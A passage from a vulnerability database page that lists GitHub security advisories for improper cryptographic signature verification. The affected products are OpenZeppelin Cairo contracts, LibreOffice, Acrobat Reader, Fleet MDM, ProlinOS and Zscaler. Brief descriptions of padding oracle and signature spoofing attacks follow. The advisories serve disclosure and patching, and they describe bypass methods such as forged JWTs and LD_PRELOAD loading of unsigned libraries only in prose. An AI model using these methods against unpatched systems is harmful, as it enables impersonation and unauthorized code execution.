    "CVE-2023-23940"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-02-02T16:59:46Z",
    "nvd_published_at": "2023-02-03T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Cause\n`is_valid_eth_signature` is missing a call to `finalize_keccak` after calling `verify_eth_signature`. \n\n### Impact\nAs a result, any contract using `is_valid_eth_signature` from the account library (such as the `EthAccount` preset) is vulnerable to a malicious sequencer. Specifically, the malicious sequencer would be able to bypass signature validation to impersonate an instance of these accounts.\n\n### Risk\nIn order to exploit this vulnerability, it is required to control a sequencer or prover since they\u0027re the ones executing the hints, being able to inject incorrect keccak results.\n\nToday StarkWare is the only party running both a prover or a sequencer, greatly reducing the risk of exploit.\n\n### Patches\nThe issue has been patched in 0.6.1.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the Contracts for Cairo repository](https://github.com/OpenZeppelin/cairo-contracts/issues/new/choose)\n* Email us at [security@openzeppelin.com](mailto:security@openzeppelin.com)",
  "id": "GHSA-626q-v9j4-mcp4",
  "modified": "2024-10-07T21:19:33Z",
  "published": "2023-02-02T16:59:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenZeppelin/cairo-contracts/security/advisories/GHSA-626q-v9j4-mcp4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23940"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OpenZeppelin/cairo-contracts/pull/542/commits/6d4cb750478fca2fd916f73297632f899aca9299"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OpenZeppelin/cairo-contracts"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/openzeppelin-cairo-contracts/PYSEC-2023-39.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenZeppelin Contracts contains Improper Verification of Cryptographic Signature"
}

GHSA-62PP-53WF-PPRQ

Vulnerability from github – Published: 2024-09-17 15:31 – Updated: 2024-09-25 21:30
VLAI
Details

Improper Digital Signature Invalidation  vulnerability in Zip Repair Mode of The Document Foundation LibreOffice allows Signature forgery vulnerability in LibreOfficeThis issue affects LibreOffice: from 24.2 before < 24.2.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-7788"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-17T15:15:14Z",
    "severity": "HIGH"
  },
  "details": "Improper Digital Signature Invalidation\u00a0 vulnerability in Zip Repair Mode of The Document Foundation LibreOffice allows Signature forgery vulnerability in LibreOfficeThis issue affects LibreOffice: from 24.2 before \u003c 24.2.5.",
  "id": "GHSA-62pp-53wf-pprq",
  "modified": "2024-09-25T21:30:34Z",
  "published": "2024-09-17T15:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7788"
    },
    {
      "type": "WEB",
      "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2024-7788"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-636H-73HJ-CHGR

Vulnerability from github – Published: 2025-12-09 21:31 – Updated: 2025-12-09 21:31
VLAI
Details

Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Improper Verification of Cryptographic Signature vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass cryptographic protections and gain limited unauthorized write access. Exploitation of this issue does not require user interaction.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-64787"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-09T21:15:59Z",
    "severity": "LOW"
  },
  "details": "Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Improper Verification of Cryptographic Signature vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass cryptographic protections and gain limited unauthorized write access. Exploitation of this issue does not require user interaction.",
  "id": "GHSA-636h-73hj-chgr",
  "modified": "2025-12-09T21:31:49Z",
  "published": "2025-12-09T21:31:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64787"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/acrobat/apsb25-119.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-63M5-974W-448V

Vulnerability from github – Published: 2026-01-20 20:55 – Updated: 2026-02-27 22:02
VLAI
Summary
Fleet has a JWT signature bypass vulnerability in Azure AD MDM enrollment
Details

Summary

A vulnerability in Fleet’s Windows MDM enrollment flow could allow an attacker to submit forged authentication tokens that are not properly validated. Because JWT signatures were not verified, Fleet could accept attacker-controlled identity claims, enabling enrollment of unauthorized devices under arbitrary Azure AD user identities.

Impact

If Windows MDM is enabled, an attacker can enroll rogue devices by submitting a forged JWT containing arbitrary identity claims. Due to missing JWT signature verification, Fleet accepts these claims without validating that the token was issued by Azure AD, allowing enrollment under any Azure AD user identity.

Patches

  • 4.78.3
  • 4.77.1
  • 4.76.2
  • 4.75.2
  • 4.53.3

Workarounds

If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.

For more information

If you have any questions or comments about this advisory:

Email us at security@fleetdm.com Join #fleet in osquery Slack

Credits

We thank @secfox-ai for responsibly reporting this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fleetdm/fleet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.78.0"
            },
            {
              "fixed": "4.78.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fleetdm/fleet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.77.0"
            },
            {
              "fixed": "4.77.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fleetdm/fleet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.76.0"
            },
            {
              "fixed": "4.76.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fleetdm/fleet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.75.0"
            },
            {
              "fixed": "4.75.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fleetdm/fleet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.43.5-0.20260112202845-e225ef57912c"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23518"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-20T20:55:17Z",
    "nvd_published_at": "2026-01-21T22:15:50Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nA vulnerability in Fleet\u2019s Windows MDM enrollment flow could allow an attacker to submit forged authentication tokens that are not properly validated. Because JWT signatures were not verified, Fleet could accept attacker-controlled identity claims, enabling enrollment of unauthorized devices under arbitrary Azure AD user identities.\n\n### Impact\n\nIf Windows MDM is enabled, an attacker can enroll rogue devices by submitting a forged JWT containing arbitrary identity claims. Due to missing JWT signature verification, Fleet accepts these claims without validating that the token was issued by Azure AD, allowing enrollment under any Azure AD user identity.\n\n### Patches\n\n- 4.78.3\n- 4.77.1\n- 4.76.2\n- 4.75.2\n- 4.53.3\n\n### Workarounds\n\nIf an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\nEmail us at [security@fleetdm.com](mailto:security@fleetdm.com)\nJoin #fleet in [osquery Slack](https://join.slack.com/t/osquery/shared_invite/zt-h29zm0gk-s2DBtGUTW4CFel0f0IjTEw)\n\n### Credits\n\nWe thank @secfox-ai for responsibly reporting this issue.",
  "id": "GHSA-63m5-974w-448v",
  "modified": "2026-02-27T22:02:58Z",
  "published": "2026-01-20T20:55:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fleetdm/fleet/security/advisories/GHSA-63m5-974w-448v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23518"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fleetdm/fleet/commit/e225ef57912c8f4ac8977e24b5ebe1d9fd875257"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fleetdm/fleet"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2026-4335"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fleet has a JWT signature bypass vulnerability in Azure AD MDM enrollment "
}

GHSA-63PW-VHJP-V4V8

Vulnerability from github – Published: 2022-05-24 17:33 – Updated: 2022-05-24 17:33
VLAI
Details

An unsigned-library issue was discovered in ProlinOS through 2.4.161.8859R. This OS requires installed applications and all system binaries to be signed either by the manufacturer or by the Point Of Sale application developer and distributor. The signature is a 2048-byte RSA signature verified in the kernel prior to ELF execution. Shared libraries, however, do not need to be signed, and they are not verified. An attacker may execute a custom binary by compiling it as a shared object and loading it via LD_PRELOAD.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-28045"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-11-02T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "An unsigned-library issue was discovered in ProlinOS through 2.4.161.8859R. This OS requires installed applications and all system binaries to be signed either by the manufacturer or by the Point Of Sale application developer and distributor. The signature is a 2048-byte RSA signature verified in the kernel prior to ELF execution. Shared libraries, however, do not need to be signed, and they are not verified. An attacker may execute a custom binary by compiling it as a shared object and loading it via LD_PRELOAD.",
  "id": "GHSA-63pw-vhjp-v4v8",
  "modified": "2022-05-24T17:33:01Z",
  "published": "2022-05-24T17:33:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28045"
    },
    {
      "type": "WEB",
      "url": "https://git.lsd.cat/g/pax-pwn"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-63RM-C268-28FH

Vulnerability from github – Published: 2024-08-06 18:30 – Updated: 2024-08-06 18:30
VLAI
Details

The Zscaler Updater process does not validate the digital signature of the installer before execution, allowing arbitrary code to be locally executed. This affects Zscaler Client Connector on MacOS <4.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-23460"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-06T16:15:47Z",
    "severity": "MODERATE"
  },
  "details": "The Zscaler Updater process does not validate the digital signature of the installer before execution, allowing arbitrary code to be locally executed. This affects Zscaler Client Connector on MacOS \u003c4.2.",
  "id": "GHSA-63rm-c268-28fh",
  "modified": "2024-08-06T18:30:56Z",
  "published": "2024-08-06T18:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23460"
    },
    {
      "type": "WEB",
      "url": "https://help.zscaler.com/client-connector/client-connector-app-release-summary-2023?applicable_category=macos\u0026applicable_version=4.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-463: Padding Oracle Crypto Attack

An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.

CAPEC-475: Signature Spoofing by Improper Validation

An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.